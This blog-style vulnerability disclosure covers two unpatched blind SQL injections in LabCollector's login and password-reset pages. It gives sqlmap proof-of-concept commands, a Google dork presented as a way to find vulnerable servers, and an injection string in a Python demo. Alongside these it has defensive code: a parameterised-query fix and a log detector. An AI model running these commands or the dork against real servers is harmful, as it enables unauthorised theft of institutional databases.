Multiple SQL injections in LabCollector from 5.4 to 5.423

Welcome to my blog!

Have you used LabCollector, the all-in-one lab notebook and management platform? Maybe you've come across it at school, college or university.

Unfortunately, LabCollector versions 5.4 through 5.423 have two SQL injections that let you extract any data in the database without logging in.

The first one is on the login page, login.php. When you sign in, the client sends the parameter login, which is your username, to the server. However, LabCollector fails to validate it, so you can inject SQL into the username and have it executed on the database server (LabCollector mostly uses MySQL). You can use sqlmap to give it a try:
sudoka@sudoka:~$ python sqlmap.py -u "http(s)://[site's name]/[LabCollector's path]/login.php" --data="login=payload&pass=pass&action=login&Submit=Sign+In" -p login --dbms=MySQL

The second one is on the forgot-password page, retrieve_password.php. As on the login page, LabCollector fails to validate the username, which is passed via the parameter user_name. Let's use sqlmap again:
sudoka@sudoka:~$ python sqlmap.py -u "http(s)://[site's name]/[LabCollector's path]/retrieve_password.php" --data="user_name=payload&action=reset_validation" -p user_name --dbms=MySQL
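Both endpoints share one defect class: a user-supplied string is spliced into the SQL text. As an added example (not LabCollector's code, whose source is not shown here), the following Python reproduces that class against an in-memory SQLite table standing in for the MySQL users table, next to the parameterised form that fixes it. The table and column names are assumptions; the same fix applies in the PHP application through mysqli or PDO prepared statements, for both the login parameter and the user_name parameter of the reset page.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the MySQL users table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (login TEXT NOT NULL, pass TEXT NOT NULL, email TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct-horse', 'alice@example.org')")
    conn.commit()
    return conn


def login_vulnerable(conn, login, password):
    """Hypothetical reconstruction of the failure class the post describes
    (not LabCollector's actual code): the login parameter is concatenated into
    the SQL text, so anything it contains is parsed as SQL, not as a value."""
    sql = "SELECT COUNT(*) FROM users WHERE login = '%s' AND pass = '%s'" % (login, password)
    return conn.execute(sql).fetchone()[0] > 0


def login_fixed(conn, login, password):
    """Parameterised form: the driver binds the values separately from the
    statement, so the user-supplied string can never change its structure."""
    sql = "SELECT COUNT(*) FROM users WHERE login = ? AND pass = ?"
    return conn.execute(sql, (login, password)).fetchone()[0] > 0


def reset_lookup_fixed(conn, user_name):
    """The retrieve_password.php path needs the same treatment: resolve the
    account for a reset by bound parameter, never by concatenation."""
    row = conn.execute("SELECT email FROM users WHERE login = ?", (user_name,)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    conn = make_db()
    # Legitimate credentials succeed either way.
    print(login_vulnerable(conn, "alice", "correct-horse"), login_fixed(conn, "alice", "correct-horse"))
    # A username carrying SQL syntax rewrites the concatenated query (the
    # trailing comment marker discards the password check); the parameterised
    # query simply finds no user with that literal name.
    crafted = "alice' --"
    print(login_vulnerable(conn, crafted, "wrong"), login_fixed(conn, crafted, "wrong"))
```

The point of the comparison is that no amount of input "validation" is needed for the fixed version to be safe: the statement text is fixed before any user data reaches the database, which is the property a WAF can only approximate from the outside.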

Do you want to find vulnerable LabCollector instances on the Internet? Use a Google dork, for example:
"LabCollector v. 5.423"

Currently, there is no patch available for these vulnerabilities. Therefore, if you own a vulnerable LabCollector server, you should at least put a WAF in front of it. There is a free but powerful one, mod_security.

The two SQL injections above are blind SQL injections, so data exfiltration may be slow, but if the vendor doesn't release a patch or hotfix, attackers can eventually get the whole database.
Note: you should use the latest sqlmap for the PoCs above, because some old versions of sqlmap won't report success.
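Because the injections are blind, reading the database out takes a long series of requests to the same two scripts, and that volume is visible in ordinary web-server logs even though POST bodies are not recorded. As an added example (not from the post and not part of LabCollector), here is a Python check over constructed combined-format access-log lines that flags a client by the number of POSTs it makes to login.php and retrieve_password.php and, as a cheap secondary signal, by a scanner that names itself in its User-Agent. The threshold, the /labcollector/ path prefix and the sample addresses are assumptions.

```python
import re
from collections import defaultdict

# Apache/Nginx "combined" log format: client, request line, status, referer
# and User-Agent. POST bodies (where the injected parameters travel) are not
# logged, so the check leans on request volume and client fingerprint.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# The two scripts named in the post; the install path in front of them varies.
WATCHED_SCRIPTS = ("/login.php", "/retrieve_password.php")


def parse_line(line):
    """Return the log fields as a dict, or None for a line that does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def flag_suspicious(lines, threshold=20):
    """Return {client_ip: [reasons]} for clients that POST to the vulnerable
    endpoints unusually often (a blind injection needs hundreds of requests to
    read out the database) or that announce an automated scanner."""
    post_counts = defaultdict(int)
    reasons = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        path = rec["path"].split("?", 1)[0]
        if not path.endswith(WATCHED_SCRIPTS):
            continue
        post_counts[rec["ip"]] += 1
        # sqlmap's default User-Agent names itself; tools can change it, so this
        # is a confirmation, not the primary signal.
        if "sqlmap" in rec["ua"].lower():
            reasons[rec["ip"]].add("sqlmap user-agent")
    for ip, n in post_counts.items():
        if n >= threshold:
            reasons[ip].add("%d POSTs to login/reset endpoints (threshold %d)" % (n, threshold))
    return {ip: sorted(r) for ip, r in reasons.items()}


def _line(ip, second, path, ua):
    # Constructed sample line in combined log format (RFC 5737 test addresses).
    return ('%s - - [10/Oct/2023:13:55:%02d +0000] "POST %s HTTP/1.1" 200 512 "-" "%s"'
            % (ip, second, path, ua))


BROWSER = "Mozilla/5.0 (X11; Linux x86_64) Firefox/118.0"
SAMPLE_LOG = (
    # constructed: one client sends 25 POSTs to login.php within a minute
    [_line("198.51.100.7", s, "/labcollector/login.php", BROWSER) for s in range(25)]
    # constructed: a self-identified scanner hits the reset page once
    + [_line("203.0.113.5", 30, "/labcollector/retrieve_password.php",
             "sqlmap/1.7 (https://sqlmap.org)")]
    # constructed: an ordinary user logs in and requests one password reset
    + [_line("192.0.2.10", 40, "/labcollector/login.php", BROWSER),
       _line("192.0.2.10", 41, "/labcollector/retrieve_password.php", BROWSER)]
)


if __name__ == "__main__":
    for ip, why in flag_suspicious(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(why))
```

The same counting logic can be fed by a WAF's audit log instead of the access log; the threshold should be tuned to the site's real login rate so that a shared campus NAT address does not trip it on normal mornings.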

If you find it valuable, please share it with other people.
If you have any questions, please don't hesitate to ask me on Twitter or leave a comment.
Thank you for reading!